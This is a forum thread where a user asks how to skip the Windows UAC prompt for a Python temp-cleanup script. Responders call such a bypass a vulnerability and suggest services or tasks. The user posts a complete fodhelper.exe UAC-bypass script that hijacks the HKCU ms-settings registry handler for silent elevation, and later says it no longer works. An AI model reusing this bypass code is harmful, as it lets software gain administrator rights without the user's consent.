Is there any code to not display the yes/no (UAC - User Account Control) message to run as adm?

Rieidi · May 5, 2023, 10:34pm

Is there any code to not display the yes/no message (UAC - User Account Control) to run as administrator? How could I do this without having to discover a windows vulnerability? This is very annoying. This is my code to try to adapt:

import pyuac
from pathlib import Path
import shutil

def main():
    print("Do stuff here that requires being run as an admin.")
    dir_path = Path('C:/Users/RIEIDI~2/AppData/Local/Temp')
    for file_path in dir_path.iterdir():
        try:
            if file_path.is_dir():
                shutil.rmtree(file_path)
            else:
                file_path.unlink()
        except OSError:
            print(f"Error deleting {file_path}")
    input("Press enter to close the window. >")

if __name__ == "__main__":
    if not pyuac.isUserAdmin():
        print("Re-launching as admin!")
        pyuac.runAsAdmin()
    else:
        main()

Rosuav · May 5, 2023, 10:39pm

So basically, you want a way for your program to elevate its own privileges without the user’s consent, but without finding a vulnerability in Windows?

csm10495 · May 5, 2023, 10:56pm

To further what was already said: If someone did find a way to do this without disabling UAC (which you could do manually if you wanted), it would be considered a vulnerability and point to a security issue with Windows… which I would hope someone would report to Microsoft instead of exploiting.

Why do you want to circumvent UAC?

Rieidi · May 5, 2023, 11:02pm

actually I’m the user and I don’t want to try to find a vulnerability in windows

csm10495 · May 5, 2023, 11:04pm

For your own computer you can try something like: How to Disable UAC in Windows 10

Rieidi · May 5, 2023, 11:05pm

I was really wondering if there was a script that turned UAC off and after running the script turns it back on well i would do what i need like delete temporary folders measure the size and do other things more sure i would report it if it was a vulnerability

Rieidi · May 5, 2023, 11:06pm

teria algum scirpt que faz isso em python ele desabilita e depois liga ?

csm10495 · May 5, 2023, 11:13pm

The problem is that if you could have a script that could disable UAC and turn it back on after, then a virus or other malicious application could do the same thing on a similar system, which would make it a vulnerability.

Rieidi · May 5, 2023, 11:20pm

I agree, but I don’t have that intention, and many python viruses that I’ve seen do this, disable UAC and change the entire registry, some of them

Rieidi · May 5, 2023, 11:44pm

knowing that maybe someone doesn’t pass it on to me for security reasons I have one last question Would you really be able to do this with UAC enabled or do some script that disables and activates later?

eryksun · May 5, 2023, 11:48pm

Once the process has elevated admin access, you have legitimate options to avoid having to get consent (or OTS credentials if the user isn’t an administrator) in future invocations of your script. You can create either a service or a task that the current user is allowed to start. Once started, the service or task can spawn your script elevated, or as SYSTEM if the user isn’t an administrator. But bypassing UAC from the outset would have to be based on an exploit, which Microsoft would eventually fix.

Rieidi · May 6, 2023, 12:03am

I understand. but it is for this reason that I would be trying to somehow avoid exploiting some vulnerabilities of windows since they will fix it Well now how antiviruses manage to run hidden as administrator without user permission and that is exactly what I try to do inside my system

csm10495 · May 6, 2023, 1:00am

They do it by installing and setting up a service as admin. During the installer, UAC will prompt.

Rieidi · May 6, 2023, 1:05am

how could i do this? I found a code on the internet maybe it works

Rieidi · May 6, 2023, 2:11am

Found this about I will check tomorrow.Bypassing Windows 10 UAC with Python | by Tom Melo | Medium

Rieidi · May 6, 2023, 4:50pm

Do you think this code might work?:

import os
import sys
import ctypes
import winreg
from pathlib import Path
import shutil
import pyuac

CMD = r"C:\Windows\System32\cmd.exe"
FOD_HELPER = r'C:\Windows\System32\fodhelper.exe'
PYTHON_CMD = "python"
REG_PATH = 'Software\Classes\ms-settings\shell\open\command'
DELEGATE_EXEC_REG_KEY = 'DelegateExecute'

def is_running_as_admin():
    '''
    Checks if the script is running with administrative privileges.
    Returns True if is running as admin, False otherwise.
    '''
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False

def create_reg_key(key, value):
    '''
    Creates a reg key
    '''
    try:
        winreg.CreateKey(winreg.HKEY_CURRENT_USER, REG_PATH)
        registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, REG_PATH, 0, winreg.KEY_WRITE)
        winreg.SetValueEx(registry_key, key, 0, winreg.REG_SZ, value)
        winreg.CloseKey(registry_key)
    except WindowsError:
        raise

def bypass_uac(cmd):
    '''
    Tries to bypass the UAC
    '''
    try:
        create_reg_key(DELEGATE_EXEC_REG_KEY, '')
        create_reg_key(None, cmd)
    except WindowsError:
        raise

def main():
    print("Do stuff here that requires being run as an admin.")
    # Deletar arquivos temporários
    dir_path = Path('C:/Users/ravier/AppData/Local/Temp')
    for file_path in dir_path.iterdir():
        try:
            if file_path.is_dir():
                shutil.rmtree(file_path)
            else:
                file_path.unlink()
        except OSError:
            print(f"Error deleting {file_path}")
    input("Press enter to close the window. >")

def execute():
    if not is_running_as_admin():
        print('[!] The script is NOT running with administrative privileges')
        print('[+] Trying to bypass the UAC')
        try:
            current_dir = os.path.dirname(os.path.realpath(__file__))
            cmd = '{} /k {} {}'.format(CMD, PYTHON_CMD, current_dir)
            bypass_uac(cmd)
            os.system(FOD_HELPER)
            sys.exit(0)
        except WindowsError:
            sys.exit(1)
    else:
        print('[+] The script is running with administrative privileges!')
        main()

if __name__ == '__main__':
    if not pyuac.isUserAdmin():
        print("Re-launching as admin!")
        pyuac.runAsAdmin()
    else:
        execute()

csm10495 · May 6, 2023, 5:07pm

I’m sorry but I don’t feel comfortable assisting in circumventing UAC.

Rieidi · May 6, 2023, 5:22pm

okay, but I wanted to do the same as the antivirus if you run it as an administrator without telling the user

Rosuav · May 6, 2023, 9:01pm

Have you tried it? Why do you think we would be better able to say whether it works than Windows itself is?

Rieidi · May 6, 2023, 9:32pm

unfortunately it doesn’t work anymore I said to see if there were any typos I found out that I have to create and install the service with elevated permissions, it will run as administrator without requiring user interaction or showing UAC.